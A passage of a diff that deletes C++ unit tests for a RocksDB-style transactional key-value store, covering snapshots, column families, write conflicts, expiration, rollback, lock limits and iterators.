-  // Modify key after transaction start
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snap
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("AAA", "bar2");
-  ASSERT_OK(s);
-
-  // Should commit since read/write was done after data changed
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, MultipleSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-  db->Put(write_options, "BBB", "bar");
-  db->Put(write_options, "CCC", "bar");
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("AAA", "bar2");
-  ASSERT_OK(s);
-
-  // Modify BBB before snapshot is taken
-  db->Put(write_options, "BBB", "bar1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "BBB", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("BBB", "bar2");
-  ASSERT_OK(s);
-
-  db->Put(write_options, "CCC", "bar1");
-
-  // Set a new snapshot
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "CCC", &value);
-  ASSERT_EQ(value, "bar1");
-  s = txn->Put("CCC", "bar2");
-  ASSERT_OK(s);
-
-  s = txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  // verify that we track multiple writes to the same key at different snapshots
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-
-  // Potentially conflicting writes
-  db->Put(write_options, "ZZZ", "zzz");
-  db->Put(write_options, "XXX", "xxx");
-
-  txn->SetSnapshot();
-
-  TransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  txn2->SetSnapshot();
-
-  // This should not conflict in txn since the snapshot is later than the
-  // previous write (spoiler alert:  it will later conflict with txn2).
-  s = txn->Put("ZZZ", "zzzz");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // This will conflict since the snapshot is earlier than another write to ZZZ
-  s = txn2->Put("ZZZ", "xxxxx");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "ZZZ", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, ColumnFamiliesTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete db;
-  db = nullptr;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, column_families,
-                          &handles, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // Write some data to the db
-  WriteBatch batch;
-  batch.Put("foo", "foo");
-  batch.Put(handles[1], "AAA", "bar");
-  batch.Put(handles[1], "AAAZZZ", "bar");
-  s = db->Write(write_options, &batch);
-  ASSERT_OK(s);
-  db->Delete(write_options, handles[1], "AAAZZZ");
-
-  // These keys do not conflict with existing writes since they're in
-  // different column families
-  s = txn->Delete("AAA");
-  ASSERT_OK(s);
-  s = txn->GetForUpdate(snapshot_read_options, handles[1], "foo", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  Slice key_slice("AAAZZZ");
-  Slice value_slices[2] = {Slice("bar"), Slice("bar")};
-  s = txn->Put(handles[2], SliceParts(&key_slice, 1),
-               SliceParts(value_slices, 2));
-  ASSERT_OK(s);
-  ASSERT_EQ(3, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, handles[2], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  Slice key_slices[3] = {Slice("AAA"), Slice("ZZ"), Slice("Z")};
-  Slice value_slice("barbarbar");
-
-  s = txn2->Delete(handles[2], "XXX");
-  ASSERT_OK(s);
-  s = txn2->Delete(handles[1], "XXX");
-  ASSERT_OK(s);
-
-  // This write will cause a conflict with the earlier batch write
-  s = txn2->Put(handles[1], SliceParts(key_slices, 3),
-                SliceParts(&value_slice, 1));
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  // In the above the latest change to AAAZZZ in handles[1] is delete.
-  s = db->Get(read_options, handles[1], "AAAZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  delete txn2;
-
-  txn = db->BeginTransaction(write_options, txn_options);
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  std::vector<ColumnFamilyHandle*> multiget_cfh = {handles[1], handles[2],
-                                                   handles[0], handles[2]};
-  std::vector<Slice> multiget_keys = {"AAA", "AAAZZZ", "foo", "foo"};
-  std::vector<std::string> values(4);
-
-  std::vector<Status> results = txn->MultiGetForUpdate(
-      snapshot_read_options, multiget_cfh, multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  s = txn->SingleDelete(handles[2], "ZZZ");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "ZZZ", "YYY");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "ZZZ", "YYYY");
-  ASSERT_OK(s);
-  s = txn->Delete(handles[2], "ZZZ");
-  ASSERT_OK(s);
-  s = txn->Put(handles[2], "AAAZZZ", "barbarbar");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, handles[2], "ZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Put a key which will conflict with the next txn using the previous snapshot
-  db->Put(write_options, handles[2], "foo", "000");
-
-  results = txn2->MultiGetForUpdate(snapshot_read_options, multiget_cfh,
-                                    multiget_keys, &values);
-  // All results should fail since there was a conflict
-  ASSERT_TRUE(results[0].IsBusy());
-  ASSERT_TRUE(results[1].IsBusy());
-  ASSERT_TRUE(results[2].IsBusy());
-  ASSERT_TRUE(results[3].IsBusy());
-
-  s = db->Get(read_options, handles[2], "foo", &value);
-  ASSERT_EQ(value, "000");
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->DropColumnFamily(handles[1]);
-  ASSERT_OK(s);
-  s = db->DropColumnFamily(handles[2]);
-  ASSERT_OK(s);
-
-  delete txn;
-  delete txn2;
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_P(TransactionTest, ColumnFamiliesTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *one, *two;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "ONE", &one);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "TWO", &two);
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn1->Put(one, "X", "1");
-  ASSERT_OK(s);
-  s = txn1->Put(two, "X", "2");
-  ASSERT_OK(s);
-  s = txn1->Put("X", "0");
-  ASSERT_OK(s);
-
-  s = txn2->Put(one, "X", "11");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // Drop first column family
-  s = db->DropColumnFamily(one);
-  ASSERT_OK(s);
-
-  // Should fail since column family was dropped.
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  txn1 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-
-  // Should fail since column family was dropped
-  s = txn1->Put(one, "X", "111");
-  ASSERT_TRUE(s.IsInvalidArgument());
-
-  s = txn1->Put(two, "X", "222");
-  ASSERT_OK(s);
-
-  s = txn1->Put("X", "000");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, two, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("222", value);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("000", value);
-
-  s = db->DropColumnFamily(two);
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  delete one;
-  delete two;
-}
-
-TEST_P(TransactionTest, EmptyTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  txn->Rollback();
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  // Conflicts with previous GetForUpdate
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  // transaction expired!
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-}
-
-TEST_P(TransactionTest, PredicateManyPreceders) {
-  WriteOptions write_options;
-  ReadOptions read_options1, read_options2;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.set_snapshot = true;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  std::vector<Slice> multiget_keys = {"1", "2", "3"};
-  std::vector<std::string> multiget_values;
-
-  std::vector<Status> results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  s = txn2->Put("2", "x");  // Conflict's with txn1's MultiGetForUpdate
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn2->Rollback();
-
-  multiget_values.clear();
-  results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("4", "x");
-  ASSERT_OK(s);
-
-  s = txn2->Delete("4");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options2, "4", &value);
-  ASSERT_TRUE(s.IsBusy());
-
-  txn2->Rollback();
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, LostUpdate) {
-  WriteOptions write_options;
-  ReadOptions read_options, read_options1, read_options2;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Test 2 transactions writing to the same key in multiple orders and
-  // with/without snapshots
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  s = txn1->Put("1", "1");
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "2");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("1", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn_options.set_snapshot = true;
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "3");
-  ASSERT_OK(s);
-  s = txn2->Put("1", "4");  // conflict
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "5");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "6");
-  ASSERT_TRUE(s.IsBusy());
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  s = txn1->Put("1", "7");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->SetSnapshot();
-  s = txn2->Put("1", "8");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("8", value);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = db->BeginTransaction(write_options);
-  txn2 = db->BeginTransaction(write_options);
-
-  s = txn1->Put("1", "9");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("1", "10");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "10");
-}
-
-TEST_P(TransactionTest, UntrackedWrites) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  // Verify transaction rollback works for untracked keys.
-  Transaction* txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = txn->PutUntracked("untracked", "0");
-  ASSERT_OK(s);
-  txn->Rollback();
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-
-  s = db->Put(write_options, "untracked", "x");
-  ASSERT_OK(s);
-
-  // Untracked writes should succeed even though key was written after snapshot
-  s = txn->PutUntracked("untracked", "1");
-  ASSERT_OK(s);
-  s = txn->MergeUntracked("untracked", "2");
-  ASSERT_OK(s);
-  s = txn->DeleteUntracked("untracked");
-  ASSERT_OK(s);
-
-  // Conflict
-  s = txn->Put("untracked", "3");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ExpiredTransaction) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Set txn expiration timeout to 0 microseconds (expires instantly)
-  txn_options.expiration = 0;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-
-  s = txn1->Put("Y", "1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  // txn2 should be able to write to X since txn1 has expired
-  s = txn2->Put("X", "2");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("2", value);
-
-  s = txn1->Put("Z", "1");
-  ASSERT_OK(s);
-
-  // txn1 should fail to commit since it is expired
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsExpired());
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, ReinitializeTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Set txn expiration timeout to 0 microseconds (expires instantly)
-  txn_options.expiration = 0;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  // Reinitialize transaction to no long expire
-  txn_options.expiration = -1;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->Put("Z", "z");
-  ASSERT_OK(s);
-
-  // Should commit since not expired
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->Put("Z", "zz");
-  ASSERT_OK(s);
-
-  // Reinitilize txn1 and verify that Z gets unlocked
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options, nullptr);
-  s = txn2->Put("Z", "zzz");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzz");
-
-  // Verify snapshots get reinitialized correctly
-  txn1->SetSnapshot();
-  s = txn1->Put("Z", "zzzz");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  const Snapshot* snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  txn_options.set_snapshot = true;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  snapshot = txn1->GetSnapshot();
-  ASSERT_TRUE(snapshot);
-
-  s = txn1->Put("Z", "a");
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-
-  s = txn1->Put("Y", "y");
-  ASSERT_OK(s);
-
-  txn_options.set_snapshot = false;
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-  snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  s = txn1->Put("X", "x");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "zzzz");
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->SetName("name");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options, txn1);
-
-  s = txn1->SetName("name");
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, Rollback) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  ASSERT_OK(s);
-
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  // txn2 should not be able to write to X since txn1 has it locked
-  s = txn2->Put("X", "2");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->Rollback();
-  delete txn1;
-
-  // txn2 should now be able to write to X
-  s = txn2->Put("X", "3");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, LockLimitTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  delete db;
-  db = nullptr;
-
-  // Open DB with a lock limit of 3
-  txn_db_options.max_num_locks = 3;
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  // Create a txn and verify we can only lock up to 3 keys
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("X", "x");
-  ASSERT_OK(s);
-
-  s = txn->Put("Y", "y");
-  ASSERT_OK(s);
-
-  s = txn->Put("Z", "z");
-  ASSERT_OK(s);
-
-  // lock limit reached
-  s = txn->Put("W", "w");
-  ASSERT_TRUE(s.IsBusy());
-
-  // re-locking same key shouldn't put us over the limit
-  s = txn->Put("X", "xx");
-  ASSERT_OK(s);
-
-  s = txn->GetForUpdate(read_options, "W", &value);
-  ASSERT_TRUE(s.IsBusy());
-  s = txn->GetForUpdate(read_options, "V", &value);
-  ASSERT_TRUE(s.IsBusy());
-
-  // re-locking same key shouldn't put us over the limit
-  s = txn->GetForUpdate(read_options, "Y", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("y", value);
-
-  s = txn->Get(read_options, "W", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn2);
-
-  // "X" currently locked
-  s = txn2->Put("X", "x");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  // lock limit reached
-  s = txn2->Put("M", "m");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xx", value);
-
-  s = db->Get(read_options, "W", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Committing txn should release its locks and allow txn2 to proceed
-  s = txn2->Put("X", "x2");
-  ASSERT_OK(s);
-
-  s = txn2->Delete("X");
-  ASSERT_OK(s);
-
-  s = txn2->Put("M", "m");
-  ASSERT_OK(s);
-
-  s = txn2->Put("Z", "z2");
-  ASSERT_OK(s);
-
-  // lock limit reached
-  s = txn2->Delete("Y");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "Z", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("z2", value);
-
-  s = db->Get(read_options, "Y", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("y", value);
-
-  s = db->Get(read_options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, IteratorTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Write some keys to the db
-  s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "G", "g");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "F", "f");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "D", "d");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Write some keys in a txn
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Put("H", "h");
-  ASSERT_OK(s);
-
-  s = txn->Delete("D");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  txn->SetSnapshot();
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write some keys to the db after the snapshot
-  s = db->Put(write_options, "BB", "xx");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "xx");
-  ASSERT_OK(s);
-
-  read_options.snapshot = snapshot;
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-  iter->SeekToFirst();
-
-  // Read all keys via iter and lock them all
-  std::string results[] = {"a", "b", "c", "e", "f", "g", "h"};
-  for (int i = 0; i < 7; i++) {
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(results[i], iter->value().ToString());
-
-    s = txn->GetForUpdate(read_options, iter->key(), nullptr);
-    if (i == 2) {
-      // "C" was modified after txn's snapshot
-      ASSERT_TRUE(s.IsBusy());
-    } else {
-      ASSERT_OK(s);
-    }
-
-    iter->Next();
-  }
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Seek("G");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("g", iter->value().ToString());
-
-  iter->Prev();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("f", iter->value().ToString());
-
-  iter->Seek("D");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("C");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("c", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("a", iter->value().ToString());
-
-  iter->Seek("X");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToLast();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("h", iter->value().ToString());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete iter;
-  delete txn;
-}
-
-TEST_P(TransactionTest, DisableIndexingTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
